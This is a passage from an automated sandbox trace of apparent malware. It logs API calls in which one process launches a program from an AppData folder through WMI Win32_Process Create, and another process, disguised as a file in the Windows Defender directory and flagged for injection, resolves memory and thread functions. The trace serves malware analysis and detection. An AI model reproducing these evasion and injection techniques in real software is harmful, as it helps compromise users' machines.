Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25b7e0 | out: ppvObject=0x25b7e0*=0x3b8440) returned 0x0 [0174.018] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x3b8440, pProxy=0x2663ad8, pAuthnSvc=0x25b880, pAuthzSvc=0x25b830, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0 | out: pAuthnSvc=0x25b880*=0xa, pAuthzSvc=0x25b830*=0x0, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0) returned 0x0 [0174.018] WbemLocator:IUnknown:Release (This=0x3b8440) returned 0x3 [0174.018] WbemLocator:IUnknown:QueryInterface (in: This=0x2663ad8, riid=0x7fef8251568*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25b7a0 | out: ppvObject=0x25b7a0*=0x3b8480) returned 0x0 [0174.019] WbemLocator:IUnknown:QueryInterface (in: This=0x2663ad8, riid=0x7fef8251628*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25b7e0 | out: ppvObject=0x25b7e0*=0x3b8440) returned 0x0 [0174.019] WbemLocator:IClientSecurity:SetBlanket (This=0x3b8440, pProxy=0x2663ad8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0174.019] WbemLocator:IUnknown:Release (This=0x3b8440) returned 0x4 [0174.019] WbemLocator:IUnknown:Release (This=0x3b8480) returned 0x3 [0174.019] WbemLocator:IUnknown:Release (This=0x3b8440) returned 0x2 [0174.019] WbemLocator:IUnknown:AddRef (This=0x2663ad8) returned 0x3 [0174.019] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2663af0 [0174.019] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x26615d0 [0174.019] WbemLocator:IUnknown:Release (This=0x2663738) returned 0x2 [0174.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0174.019] GetCurrentThreadId () returned 0x964 [0174.019] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0174.020] GetCurrentThreadId () returned 0x964 [0174.020] WbemLocator:IUnknown:QueryInterface (in: This=0x2663ad8, riid=0x7fef8251628*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25bac8 | out: ppvObject=0x25bac8*=0x3b8440) returned 0x0 [0174.020] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x3b8440, pProxy=0x2663ad8, pAuthnSvc=0x25bac0, pAuthzSvc=0x25bb08, pServerPrincName=0x0, pAuthnLevel=0x25bb30, pImpLevel=0x25bb28, pAuthInfo=0x0, pCapabilites=0x25baf8 | out: pAuthnSvc=0x25bac0*=0xa, pAuthzSvc=0x25bb08*=0x0, pServerPrincName=0x0, pAuthnLevel=0x25bb30*=0x6, pImpLevel=0x25bb28*=0x3, pAuthInfo=0x0, pCapabilites=0x25baf8*=0x20) returned 0x0 [0174.020] WbemLocator:IUnknown:Release (This=0x3b8440) returned 0x2 [0174.020] WbemDefPath:IWbemPath:GetInfo (in: This=0x2651670, uRequestedInfo=0x0, puResponse=0x25bb30 | out: puResponse=0x25bb30*=0xc15) returned 0x0 [0174.020] WbemDefPath:IWbemPath:GetText (in: This=0x2651670, lFlags=2, puBuffLength=0x25bb60*=0x0, pszText=0x0 | out: puBuffLength=0x25bb60*=0xe, pszText=0x0) returned 0x0 [0174.020] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2651890 [0174.020] WbemDefPath:IWbemPath:GetText (in: This=0x2651670, lFlags=2, puBuffLength=0x25bb60*=0xe, pszText="㮐ɦ" | out: puBuffLength=0x25bb60*=0xe, pszText="Win32_Process") returned 0x0 [0174.020] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0174.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0174.020] GetCurrentThreadId () returned 0x964 [0174.020] WbemLocator:IUnknown:AddRef (This=0x2663ad8) returned 0x3 [0174.020] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0174.020] GetCurrentThreadId () returned 0x964 [0174.021] IWbemServices:GetObject (in: This=0x2663ad8, strObjectPath="Win32_Process", lFlags=0, pCtx=0x0, ppObject=0x25bb28*=0x0, ppCallResult=0x0 | out: ppObject=0x25bb28*=0x2668c00, ppCallResult=0x0) returned 0x0 [0174.070] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2668f70 [0174.070] IUnknown:AddRef (This=0x2668c00) returned 0x2 [0174.070] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2668ff0 [0174.070] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x26690a0 [0174.070] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2669140 [0174.070] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x26691e0 [0174.070] WbemLocator:IUnknown:AddRef (This=0x2663ad8) returned 0x4 [0174.070] SysStringLen (param_1="\\\\.\\root\\cimv2") returned 0xe [0174.070] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2662240 [0174.070] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2669220 [0174.070] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x2669260 [0174.070] IUnknown:AddRef (This=0x2668c00) returned 0x3 [0174.070] IUnknown:Release (This=0x2668c00) returned 0x2 [0174.070] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x25ba80 | out: pperrinfo=0x25ba80*=0x0) returned 0x1 [0174.071] WbemLocator:IUnknown:Release (This=0x2663ad8) returned 0x3 [0174.071] CreatePointerMoniker (in: punk=0x2668f70, ppmk=0x25bdd0 | out: ppmk=0x25bdd0*=0x3bbdd0) returned 0x0 [0174.071] IUnknown:AddRef (This=0x2668f70) returned 0x2 [0174.071] WbemLocator:IUnknown:Release (This=0x2663ad8) returned 0x2 [0174.071] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0174.071] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0174.071] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0174.071] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0174.071] WbemDefPath:IUnknown:Release (This=0x2651670) returned 0x0 [0174.071] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0174.071] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0174.071] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0174.071] WbemLocator:IUnknown:Release (This=0x26514e0) returned 0x0 [0174.071] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0174.071] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0174.071] WinMGMTS:IUnknown:Release (This=0x26513d0) returned 0x0 [0174.071] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0174.072] IUnknown:Release (This=0x3a2400) returned 0x0 [0174.072] GetProcAddress (hModule=0x7fefe2b0000, lpProcName="BindMoniker") returned 0x7fefe2b9950 [0174.072] BindMoniker (in: pmk=0x3bbdd0, grfOpt=0x0, iidResult=0x7fef8346350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x25be58 | out: ppvResult=0x25be58*=0x2668f70) returned 0x0 [0174.072] IUnknown:QueryInterface (in: This=0x2668f70, riid=0x7fef8346350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25be58 | out: ppvObject=0x25be58*=0x2668f70) returned 0x0 [0174.072] IUnknown:Release (This=0x3bbdd0) returned 0x0 [0174.072] IUnknown:Release (This=0x2668f70) returned 0x1 [0174.072] LoadRegTypeLib (in: rguid=0x7fef82517a8*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x25c050*=0x0 | out: pptlib=0x25c050*=0x3c1fc0) returned 0x0 [0174.082] ITypeLib:GetTypeInfoType (in: This=0x3c1fc0, index=0xf8251908, pTKind=0x2662270 | out: pTKind=0x2662270*=3943592) returned 0x0 [0174.082] IUnknown:Release (This=0x3c1fc0) returned 0x1 [0174.082] DispGetIDsOfNames (in: ptinfo=0x3c2ca8, rgszNames=0x25c0f0*="Create", cNames=0x1, rgdispid=0x25c1d8 | out: rgdispid=0x25c1d8*=-1) returned 0x80020006 [0174.085] IUnknown:AddRef (This=0x2668c00) returned 0x3 [0174.086] IWbemClassObject:Get (in: This=0x2668c00, wszName="Create", lFlags=0, pVal=0x0, pType=0x0, plFlavor=0x25c080*=0 | out: pVal=0x0, pType=0x0, plFlavor=0x25c080*=0) returned 0x80041002 [0174.086] IUnknown:Release (This=0x2668c00) returned 0x2 [0174.086] IWbemClassObject:Get (in: This=0x2668c00, wszName="__GENUS", lFlags=0, pVal=0x25bec0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x25bec0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0174.086] IUnknown:AddRef (This=0x2668c00) returned 0x3 [0174.086] IUnknown:AddRef (This=0x2668c00) returned 0x4 [0174.086] IWbemClassObject:GetMethod (in: This=0x2668c00, wszName="Create", lFlags=0, ppInSignature=0x25bfb0, ppOutSignature=0x25bfb8 | out: ppInSignature=0x25bfb0*=0x26513d0, ppOutSignature=0x25bfb8*=0x2669dc0) returned 0x0 [0174.086] IWbemClassObject:GetNames (in: This=0x26513d0, wszQualifierName=0x0, lFlags=0, pQualifierVal=0x0, pNames=0x25bfc8 | out: pNames=0x25bfc8*="\x01ƀ\x08") returned 0x0 [0174.086] IWbemClassObject:GetNames (in: This=0x2669dc0, wszQualifierName=0x0, lFlags=0, pQualifierVal=0x0, pNames=0x25bfc0 | out: pNames=0x25bfc0*="\x01ƀ\x08") returned 0x0 [0174.086] IUnknown:Release (This=0x2668c00) returned 0x3 [0174.086] SysStringLen (param_1="Create") returned 0x6 [0174.086] ?WbemMemAlloc@CWin32DefaultArena@@SAPEAX_K@Z () returned 0x26615d0 [0174.086] SysStringLen (param_1="Create") returned 0x6 [0174.086] IUnknown:Release (This=0x2669dc0) returned 0x0 [0174.086] IUnknown:Release (This=0x26513d0) returned 0x0 [0174.087] IUnknown:Release (This=0x3c2ca8) returned 0x1 [0174.087] ??2@YAPEAX_K@Z () returned 0x18a3f0 [0174.087] IUnknown:AddRef (This=0x3c2ca8) returned 0x2 [0174.087] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0174.087] GetCurrentThreadId () returned 0x964 [0174.087] SysStringLen (param_1="Create") returned 0x6 [0174.087] IWbemClassObject:GetMethod (in: This=0x2668c00, wszName="Create", lFlags=0, ppInSignature=0x25bf98, ppOutSignature=0x25bfa0 | out: ppInSignature=0x25bf98*=0x26513d0, ppOutSignature=0x25bfa0*=0x2669dc0) returned 0x0 [0174.087] IWbemClassObject:SpawnInstance (in: This=0x26513d0, lFlags=0, ppNewInstance=0x25bfa8 | out: ppNewInstance=0x25bfa8*=0x266a130) returned 0x0 [0174.087] IWbemClassObject:BeginEnumeration (This=0x26513d0, lEnumFlags=64) returned 0x0 [0174.088] IWbemClassObject:Next (in: This=0x26513d0, lFlags=0, strName=0x25bf68*=0x0, pVal=0x0, pType=0x25bf60*=40275832, plFlavor=0x0 | out: strName=0x25bf68*="CommandLine", pVal=0x0, pType=0x25bf60*=8, plFlavor=0x0) returned 0x0 [0174.088] IWbemClassObject:GetPropertyQualifierSet (in: This=0x26513d0, wszProperty="CommandLine", ppQualSet=0x25bee0 | out: ppQualSet=0x25bee0*=0x2651740) returned 0x0 [0174.088] IWbemQualifierSet:Get (in: This=0x2651740, wszName="id", lFlags=0, pVal=0x25bf00*(varType=0x0, wReserved1=0x25, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fef8269bd4, varVal2=0x25bf58), plFlavor=0x0 | out: pVal=0x25bf00*(varType=0x3, wReserved1=0x25, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000000, varVal2=0x25bf58), plFlavor=0x0) returned 0x0 [0174.088] IWbemClassObject:Put (This=0x266a130, wszName="CommandLine", lFlags=0, pVal=0x25bee8*(varType=0x8, wReserved1=0xf6b0, wReserved2=0x7fe, wReserved3=0x0, varVal1="C:/Users/5p5NrGJn0jS HALPmcxz/AppData/Roaming/gtjtdfe", varVal2=0x25bf98), Type=0) returned 0x0 [0174.088] IUnknown:Release (This=0x2651740) returned 0x0 [0174.088] IWbemClassObject:Next (in: This=0x26513d0, lFlags=0, strName=0x25bf68*=0x0, pVal=0x0, pType=0x25bf60*=8, plFlavor=0x0 | out: strName=0x25bf68*="CurrentDirectory", pVal=0x0, pType=0x25bf60*=8, plFlavor=0x0) returned 0x0 [0174.088] IWbemClassObject:GetPropertyQualifierSet (in: This=0x26513d0, wszProperty="CurrentDirectory", ppQualSet=0x25bee0 | out: ppQualSet=0x25bee0*=0x2651740) returned 0x0 [0174.088] IWbemQualifierSet:Get (in: This=0x2651740, wszName="id", lFlags=0, pVal=0x25bf00*(varType=0x0, wReserved1=0x25, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000000, varVal2=0x25bf58), plFlavor=0x0 | out: pVal=0x25bf00*(varType=0x3, wReserved1=0x25, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000001, varVal2=0x25bf58), plFlavor=0x0) returned 0x0 [0174.088] IWbemClassObject:Put (This=0x266a130, wszName="CurrentDirectory", lFlags=0, pVal=0x25bee8*(varType=0x1, wReserved1=0xf6b0, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x3b3a88, varVal2=0x25bf98), Type=0) returned 0x0 [0174.088] IUnknown:Release (This=0x2651740) returned 0x0 [0174.088] IWbemClassObject:Next (in: This=0x26513d0, lFlags=0, strName=0x25bf68*=0x0, pVal=0x0, pType=0x25bf60*=8, plFlavor=0x0 | out: strName=0x25bf68*="ProcessStartupInformation", pVal=0x0, pType=0x25bf60*=13, plFlavor=0x0) returned 0x0 [0174.088] IWbemClassObject:GetPropertyQualifierSet (in: This=0x26513d0, wszProperty="ProcessStartupInformation", ppQualSet=0x25bee0 | out: ppQualSet=0x25bee0*=0x2651740) returned 0x0 [0174.088] IWbemQualifierSet:Get (in: This=0x2651740, wszName="id", lFlags=0, pVal=0x25bf00*(varType=0x0, wReserved1=0x25, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000001, varVal2=0x25bf58), plFlavor=0x0 | out: pVal=0x25bf00*(varType=0x3, wReserved1=0x25, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000002, varVal2=0x25bf58), plFlavor=0x0) returned 0x0 [0174.089] IWbemClassObject:Put (This=0x266a130, wszName="ProcessStartupInformation", lFlags=0, pVal=0x25bee8*(varType=0x1, wReserved1=0xf6b0, wReserved2=0x7fe, wReserved3=0x0, varVal1=0x3b3a88, varVal2=0x25bf98), Type=0) returned 0x0 [0174.089] IUnknown:Release (This=0x2651740) returned 0x0 [0174.089] IWbemClassObject:Next (in: This=0x26513d0, lFlags=0, strName=0x25bf68*=0x0, pVal=0x0, pType=0x25bf60*=13, plFlavor=0x0 | out: strName=0x25bf68*=0x0, pVal=0x0, pType=0x25bf60*=13, plFlavor=0x0) returned 0x40005 [0174.089] WbemLocator:IUnknown:AddRef (This=0x2663ad8) returned 0x3 [0174.089] IWbemClassObject:Get (in: This=0x2668c00, wszName="__RELPATH", lFlags=0, pVal=0x25bfc8*(varType=0x0, wReserved1=0xf826, wReserved2=0x7fe, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x7fef8253770), pType=0x0, plFlavor=0x0 | out: pVal=0x25bfc8*(varType=0x8, wReserved1=0xf826, wReserved2=0x7fe, wReserved3=0x0, varVal1="Win32_Process", varVal2=0x7fef8253770), pType=0x0, plFlavor=0x0) returned 0x0 [0174.089] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0174.089] GetCurrentThreadId () returned 0x964 [0174.089] IWbemServices:ExecMethod (in: This=0x2663ad8, strObjectPath="Win32_Process", strMethodName="Create", lFlags=0, pCtx=0x0, pInParams=0x266a130, ppOutParams=0x25bfb0*=0x0, ppCallResult=0x0 | out: ppOutParams=0x25bfb0*=0x266af20, ppCallResult=0x0) returned 0x0 [0177.207] IWbemClassObject:BeginEnumeration (This=0x2669dc0, lEnumFlags=64) returned 0x0 [0177.207] IWbemClassObject:Next (in: This=0x2669dc0, lFlags=0, strName=0x25bf60*=0x0, pVal=0x0, pType=0x0, plFlavor=0x0 | out: strName=0x25bf60*="ProcessId", pVal=0x0, pType=0x0, plFlavor=0x0) returned 0x0 [0177.207] IWbemClassObject:Get (in: This=0x266af20, wszName="ProcessId", lFlags=0, pVal=0x25bed8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3c9ab8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x25bed8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5b8, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0177.207] _wcsicmp (_String1="ProcessId", _String2="ReturnValue") returned -2 [0177.207] IWbemClassObject:GetPropertyQualifierSet (in: This=0x2669dc0, wszProperty="ProcessId", ppQualSet=0x25bed0 | out: ppQualSet=0x25bed0*=0x2651740) returned 0x0 [0177.207] IWbemQualifierSet:Get (in: This=0x2651740, wszName="id", lFlags=0, pVal=0x25bf08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xfffffffffffffffe, varVal2=0x3ca2d8), plFlavor=0x0 | out: pVal=0x25bf08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffffffff00000003, varVal2=0x3ca2d8), plFlavor=0x0) returned 0x0 [0177.207] IUnknown:Release (This=0x2651740) returned 0x0 [0177.207] IWbemClassObject:Next (in: This=0x2669dc0, lFlags=0, strName=0x25bf60*=0x0, pVal=0x0, pType=0x0, plFlavor=0x0 | out: strName=0x25bf60*="ReturnValue", pVal=0x0, pType=0x0, plFlavor=0x0) returned 0x0 [0177.207] IWbemClassObject:Get (in: This=0x266af20, wszName="ReturnValue", lFlags=0, pVal=0x25bed8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x5b8, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x25bed8*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0177.207] _wcsicmp (_String1="ReturnValue", _String2="ReturnValue") returned 0 [0177.207] IWbemClassObject:Next (in: This=0x2669dc0, lFlags=0, strName=0x25bf60*=0x0, pVal=0x0, pType=0x0, plFlavor=0x0 | out: strName=0x25bf60*=0x0, pVal=0x0, pType=0x0, plFlavor=0x0) returned 0x40005 [0177.208] GetErrorInfo (in: dwReserved=0x0, pperrinfo=0x25bee0 | out: pperrinfo=0x25bee0*=0x0) returned 0x1 [0177.208] IUnknown:Release (This=0x266af20) returned 0x0 [0177.208] WbemLocator:IUnknown:Release (This=0x2663ad8) returned 0x2 [0177.208] IUnknown:Release (This=0x266a130) returned 0x0 [0177.208] IUnknown:Release (This=0x2669dc0) returned 0x0 [0177.208] IUnknown:Release (This=0x26513d0) returned 0x0 [0177.208] IUnknown:Release (This=0x3c2ca8) returned 0x1 [0177.208] GetCurrentThreadId () returned 0x964 [0177.208] ISystemDebugEventFire:IsActive (This=0x38f970) returned 0x1 [0177.209] ??3@YAXPEAX@Z () returned 0x66333801 [0177.209] free (_Block=0x1884c0) [0177.209] GetUserDefaultLCID () returned 0x409 [0177.209] GetACP () returned 0x4e4 [0177.210] CoGetObjectContext (in: riid=0x7fef8346350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25e078 | out: ppv=0x25e078*=0x380060) returned 0x0 [0177.210] IUnknown:Release (This=0x2668c00) returned 0x2 [0177.210] WbemLocator:IUnknown:Release (This=0x2663ad8) returned 0x1 [0177.210] WbemLocator:IUnknown:Release (This=0x2663ad8) returned 0x0 [0177.212] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0177.212] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0177.212] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0177.212] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0177.212] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0177.212] IUnknown:Release (This=0x2668c00) returned 0x1 [0177.212] IUnknown:Release (This=0x2668c00) returned 0x0 [0177.212] IUnknown:Release (This=0x3c2ca8) returned 0x0 [0177.213] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0177.213] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0177.213] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0177.213] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0177.213] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0177.213] free (_Block=0x18a490) [0177.213] ??3@YAXPEAX@Z () returned 0x66333801 [0177.213] ??3@YAXPEAX@Z () returned 0x66333801 [0177.214] ??3@YAXPEAX@Z () returned 0x66333801 [0177.214] MulDiv (nNumber=4, nNumerator=100, nDenominator=8) returned 50 [0177.214] IUnknown:Release (This=0x380060) returned 0x1 [0177.214] GetTickCount () returned 0x1164cd9 [0177.214] CoGetObjectContext (in: riid=0x7fef8346350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25e078 | out: ppv=0x25e078*=0x380060) returned 0x0 [0177.214] MulDiv (nNumber=0, nNumerator=100, nDenominator=4) returned 0 [0177.214] IUnknown:Release (This=0x380060) returned 0x1 [0177.214] GetTickCount () returned 0x1164cd9 [0177.214] ISystemDebugEventFire:EndSession (This=0x38f970) returned 0x0 [0177.214] IUnknown:Release (This=0x38f970) returned 0x1 [0177.214] IUnknown:Release (This=0x38f970) returned 0x0 [0177.215] free (_Block=0x188640) [0177.215] ??3@YAXPEAX@Z () returned 0x66333801 [0177.215] ??3@YAXPEAX@Z () returned 0x66333801 [0177.215] CoGetObjectContext (in: riid=0x7fef8346350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25e138 | out: ppv=0x25e138*=0x380060) returned 0x0 [0177.215] ??3@YAXPEAX@Z () returned 0x66333801 [0177.215] free (_Block=0x18a360) [0177.215] free (_Block=0x18a920) [0177.215] ??3@YAXPEAX@Z () returned 0x66333801 [0177.215] ??3@YAXPEAX@Z () returned 0x66333801 [0177.215] ??3@YAXPEAX@Z () returned 0x66333801 [0177.216] ??3@YAXPEAX@Z () returned 0x66333801 [0177.216] ??3@YAXPEAX@Z () returned 0x66333801 [0177.216] StdGlobalInterfaceTable:IGlobalInterfaceTable:RevokeInterfaceFromGlobal (This=0x7fefe48a1b0, dwCookie=0x100) returned 0x0 [0177.216] IUnknown:Release (This=0x189690) returned 0x1 [0177.216] IUnknown:Release (This=0x380060) returned 0x1 [0177.216] ??3@YAXPEAX@Z () returned 0x66333801 [0177.216] IUnknown:Release (This=0x380060) returned 0x0 [0177.221] swprintf_s (in: _Dst=0x25f020, _SizeInWords=0x400, _Format="0x%08lx" | out: _Dst="0x80020006") returned 10 [0177.222] FreeLibrary (hLibModule=0x7fef85f0000) returned 1 [0177.223] OleUninitialize () [0177.224] DllCanUnloadNow () returned 0x0 [0177.224] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0177.224] FreeLibrary (hLibModule=0x7fefdbf0000) returned 1 [0177.224] DllCanUnloadNow () returned 0x1 [0177.224] ?WbemMemFree@CWin32DefaultArena@@SAHPEAX@Z () returned 0x1 [0177.224] free (_Block=0x18ac50) [0177.262] GetProcAddress (hModule=0x7fefdbf0000, lpProcName="UnregisterTraceGuids") returned 0x76f73c80 [0177.262] EtwEventUnregister (RegHandle=0x800010001) returned 0x0 [0177.262] EtwEventUnregister (RegHandle=0x900010001) returned 0x0 [0177.262] ??3@YAXPEAX@Z () returned 0x66333801 [0177.262] free (_Block=0x1866d0) [0177.266] exit (_Code=5) Thread: id = 265 os_tid = 0xaa8 Thread: id = 272 os_tid = 0xb50 Thread: id = 273 os_tid = 0xb4c Thread: id = 274 os_tid = 0xb64 Thread: id = 275 os_tid = 0xb68 Process: id = "30" image_name = "birth bean.exe" filename = "c:\\program files (x86)\\windows defender\\birth bean.exe" page_root = "0x66107000" os_pid = "0x7a4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "injection" parent_id = "16" os_parent_pid = "0x958" cmd_line = "\"C:\\Program Files (x86)\\Windows Defender\\birth bean.exe\" " cur_dir = "C:\\Program Files (x86)\\Windows Defender\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 252 os_tid = 0x9b4 Thread: id = 253 os_tid = 0x7b0 Thread: id = 254 os_tid = 0x5e8 [0170.050] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0170.051] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0170.051] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0170.051] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0170.051] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0170.051] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0170.051] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0170.051] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0170.051] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0170.052] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0170.052] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0170.052] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0170.052] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0170.052] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0170.052] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0170.052] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0170.052] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0170.052] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0170.052] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0170.052] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0170.052] GetProcAddress (hModule=0x76c20000, 